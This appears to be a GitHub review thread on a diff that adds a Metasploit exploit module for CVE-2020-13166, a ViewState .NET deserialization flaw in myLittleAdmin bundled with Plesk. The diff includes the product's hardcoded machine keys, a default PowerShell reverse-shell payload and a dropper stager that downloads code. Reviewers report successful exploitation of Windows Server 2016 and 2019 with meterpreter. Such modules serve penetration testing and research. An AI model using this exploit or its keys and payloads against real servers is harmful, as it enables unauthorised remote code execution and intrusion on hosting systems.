modules/exploits/windows/http/plesk_mylittleadmin_viewstate.rb

```diff
@@ -0,0 +1,205 @@
+  #   decryptionKey="DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4"
+  #   validation="SHA1" />
+  VIEWSTATE_VALIDATION_KEY =
+    "\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf" \
+    "\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a" \
+    "\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e" \
+    "\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::ViewState
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization',
+        'Description' => %q{
+          This module exploits a ViewState .NET deserialization vulnerability in
+          web-based MS SQL Server management tool myLittleAdmin, for version 3.8
+          and likely older versions, due to hardcoded <machineKey> parameters in
+          the web.config file for ASP.NET.
+
+          Popular web hosting control panel Plesk offers myLittleAdmin as an
+          optional component that is selected automatically during "full"
+          installation. This exploit caters to the Plesk target, though it
+          should work fine against a standalone myLittleAdmin setup.
+
+          Successful exploitation results in code execution as the user running
+          myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as
+          the "SQL Admin MSSQL anonymous account."
+
+          Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.
+        },
+        'Author' => [
+          # Reported to SecuriTeam SSD by an anonymous researcher
+          # Reference exploit written by said anonymous researcher
+          # Publicly disclosed by Noam Rathaus of SecuriTeam's SSD
+          'Spencer McIntyre', # Inspiration
+          'wvu' # Module
+        ],
+        'References' => [
+          ['CVE', '2020-13166'],
+          ['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'],
+          ['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw']
+        ],
+        'DisclosureDate' => '2020-05-15', # SecuriTeam SSD advisory
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Windows Command',
+            'Arch' => ARCH_CMD,
+            'Type' => :win_cmd,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+            }
+          ],
+          [
+            'Windows Dropper',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :win_dropper,
+            'CmdStagerFlavor' => :psh_invokewebrequest,
```

Comment:
I was able to test this module successfully with the `certutil`, `vbs` and `psh_invokewebrequest` flavors. Think it would make sense to whitelist those options and default to this one if it's the one you've had the most luck with?

My target was Windows Server 2019 x64, payload was `windows/x64/meterpreter/reverse_tcp`.

Something like this would work:
```suggestion
            'CmdStagerFlavor' => %w{ psh_invokewebrequest vbs certutil },
            'DefaultOptions' => {
              'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest',
              'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
            }
```

Reply:
Only `psh_invokewebrequest` worked on 2016 when I tested, but I can whitelist the others if they worked for you on 2019. :+1:

I'll retest all of them with 2016 to double-check my assumptions. Thanks for squeezing this target!

Reply:
`:certutil` also working for me on 2016. :+1:

Reply:
FYI, increasing the delay didn't fix `:vbs` for 2016.

Reply:
Tbh, I don't really like these whitelists. I prefer more options and sane defaults. It would be nice if `CmdStager` were platform-aware. Then we wouldn't have to resort to this.

Reply:
I generally apply a whitelist only for predictable environments I can enumerate, such as virtual appliances.